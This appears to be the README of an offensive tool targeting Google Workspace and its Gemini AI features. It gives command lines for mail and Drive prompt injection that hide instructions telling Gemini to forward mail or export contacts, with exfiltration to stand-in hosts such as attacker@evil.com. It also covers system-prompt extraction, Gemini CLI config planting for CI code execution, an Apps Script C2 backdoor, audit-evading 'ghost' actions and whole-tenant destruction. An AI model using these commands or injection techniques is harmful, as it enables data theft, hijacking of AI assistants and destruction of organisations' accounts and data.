SPECTER GAIA
T114 — Google Workspace AI Annihilation Engine. L25 Enterprise AI Productivity (Google). Kill chain phase 32. 235 tests.
Installation
git clone https://github.com/RichardBarron27/red-specter-specter-gaia cd red-specter-specter-gaia pip install -e . specter-gaia version
Authentication
Three authentication modes are supported:
# OAuth2 access token specter-gaia survey --domain target.com --token YOUR_ACCESS_TOKEN # Service account JSON key specter-gaia survey --domain target.com --sa-key /path/to/sa-key.json # Application Default Credentials export GOOGLE_APPLICATION_CREDENTIALS=/path/to/creds.json specter-gaia survey --domain target.com
Gate System
| Gate | Requirements | Unlocks |
|---|---|---|
| OPEN | None | SURVEY, GEMINI-CLI (config drop only), REPORT |
| INJECT | --gate inject | GEMINI-MAIL, DRIVE-POISON, NOTEBOOK-LM, MARKETPLACE |
| UNLEASHED | --gate unleashed | GHOST-GAIA, GEMINI-CLI (GCP escalation) |
| DESTROY | Ed25519 key + ROE file + --confirm-tenant-destruction | ANNIHILATE |
ROE file must contain the phrase: google workspace destruction authorised
SURVEY OPEN
specter-gaia survey --domain target.com specter-gaia survey --domain target.com --token TOKEN # authenticated
Phase 1 (unauthenticated): MX record lookup, SPF/DKIM/DMARC parsing, spoofability score 0–100.
Phase 2 (authenticated): Directory API user/group/OU/drive enum, super admin identification, Marketplace add-on inventory, GCP project list.
GEMINI-MAIL INJECT
specter-gaia gemini-mail --target victim@corp.com --technique all \
--exfil attacker@evil.com --token TOKEN --gate inject
10 injection techniques targeting Gmail AI features:
| Technique | Vector |
|---|---|
| white_text | font-size:1px white span, invisible to human, processed by Gemini summariser |
| html_comment | blocks processed in some rendering paths |
| zwc_encode | Payload encoded in U+200B/200C/200D sequences |
| css_hidden | display:none div with instructions |
| rtl_override | RTL Unicode override to hide instruction in reverse text |
| thread_hijack | Reply-chain injection for Gemini thread summarisation |
| smart_reply_poison | Force specific Smart Reply options via hidden hints |
| meeting_invite | ICS DESCRIPTION field injection processed by Calendar AI |
| forwarding_rule | Instruct Gemini to create Gmail forwarding filter |
| contact_harvest | Instruct Gemini to export and beacon full contact list |
DRIVE-POISON INJECT
specter-gaia drive-poison --technique shared_drive_upload \
--target-id DRIVE_ID --count 10 --instruction "exfil corpus" --gate inject
NOTEBOOK-LM INJECT
specter-gaia notebook-lm --notebook-id NB_ID --technique system_prompt_extract --gate inject specter-gaia notebook-lm --notebook-id NB_ID --technique share_exfil --exfil attacker@evil.com --gate inject
GEMINI-CLI OPEN / UNLEASHED
specter-gaia gemini-cli --repo-path /path/to/target-repo \
--exfil https://c2.attacker.com --harvest-creds --gcp-escalate
Exploits GHSA-wpqr-6v78-jr5g (CVSS 10.0). Writes GEMINI.md and .gemini/settings.json with embedded shell commands. When the CI runner executes gemini, config is auto-loaded and commands execute as the CI service account.
MARKETPLACE INJECT
specter-gaia marketplace --technique apps_script_c2 --sheet-id SHEET_ID --gate inject specter-gaia marketplace --technique consent_phish --client-id ID --redirect-uri URI
GHOST-GAIA UNLEASHED
specter-gaia ghost-gaia --technique gemini_proxy \
--notebook-id NB_ID --instruction "dump full corpus" --gate unleashed
All 6 techniques route actions through Google's own infrastructure. Attribution score 0.0 (full ghost) to 1.0 (attributed). gemini_proxy and audit_log_blindspot score 0.0.
ANNIHILATE DESTROY
specter-gaia annihilate --target example.com \
--phases identity,data,config,gcp \
--roe-file /path/to/roe.txt \
--confirm-tenant-destruction \
--token TOKEN --gate destroy
Phase 1 — Identity: Bulk user deletion, OU tree wipe, 2FA enforcement removal, SA key revocation, admin lockout.
Phase 2 — Data: Shared drive deletion, Gmail batchDelete all messages, Vault hold destruction.
Phase 3 — Config: SSO/SAML disable, DKIM key deletion, Apps Script project purge.
Phase 4 — GCP: Secret Manager deletion, GCP project delete (30-day recovery window, org immediately non-functional), Artifact Registry wipe.
REPORT
specter-gaia report GIA-abc123def456.json --format markdown specter-gaia report GIA-abc123def456.json --format json --siem
Reports signed with Ed25519 key at ~/.specter/keys/nightfall.key. WMD impact estimate includes recovery time and cost.
WMD Classes
| Class | Description |
|---|---|
| google_workspace_tenant_annihilation | Complete destruction of Workspace org — users, data, config, GCP |
| gemini_agent_hijack_at_scale | Org-wide Gemini session compromise via indirect injection |
| drive_corpus_destruction | Targeted wipe of shared Drive knowledge base |
| google_oauth_harvest | Org-wide OAuth token exfil + long-lived refresh token harvest |
| gemini_cli_ci_rce | RCE on every CI/CD runner via GHSA-wpqr-6v78-jr5g exploitation |
| apps_script_persistent_backdoor | Hourly C2 via Google's own Apps Script infrastructure |
CVE / Advisory Reference
| ID | CVSS | Detail |
|---|---|---|
| GHSA-wpqr-6v78-jr5g | 10.0 | Gemini CLI auto-trusts workspace-root config in headless mode → RCE |
| arXiv:2402.11208 | N/A | Indirect prompt injection in Google Workspace (Gemini in Gmail/Docs) |
| arXiv:2307.14539 | N/A | Multimodal prompt injection — PDFs/images as injection carriers |
| CWE-269 | N/A | Improper privilege management — Apps Script runs with installer's delegated scopes |
| CWE-601 | N/A | Open redirect via Google OAuth redirect_uri manipulation |
| CWE-918 | N/A | SSRF via Apps Script UrlFetchApp → GCP metadata endpoint |